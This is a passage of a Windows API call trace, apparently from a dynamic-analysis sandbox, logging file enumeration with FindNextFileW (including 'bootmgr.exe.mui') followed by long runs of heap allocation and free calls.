out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.527] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.527] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.527] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.528] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: 